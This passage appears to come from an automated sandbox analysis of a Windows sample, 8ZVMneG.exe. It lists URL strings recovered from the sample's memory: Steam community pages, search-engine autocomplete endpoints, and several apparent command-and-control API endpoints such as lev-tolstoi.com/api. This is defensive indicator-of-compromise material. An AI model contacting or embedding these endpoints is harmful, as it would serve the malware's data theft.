              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=Q6Qn
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=lILQ2m8IgfoI&l=e
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/api
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/api2H
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.co
              Source: 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2354896716.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2399977215.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2354654616.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427078648.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402833146.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440560885.0000000003C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/(x8
              Source: 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;.
              Source: 8ZVMneG.exe, 00000003.00000002.2485639494.0000000003C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/B
              Source: 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Dr
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Ed
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/OF_
              Source: 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/Spe
              Source: 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2483778671.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
              Source: 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api0b
              Source: 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apibV7
              Source: 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apiwDnl
              Source: 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/e
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/g
              Source: 8ZVMneG.exe, 00000003.00000002.2485639494.0000000003C10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/k
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/piMe
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/s
              Source: 8ZVMneG.exe, 00000003.00000003.2483778671.00000000013B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/apical
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sordid-snaked.cyou/api
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
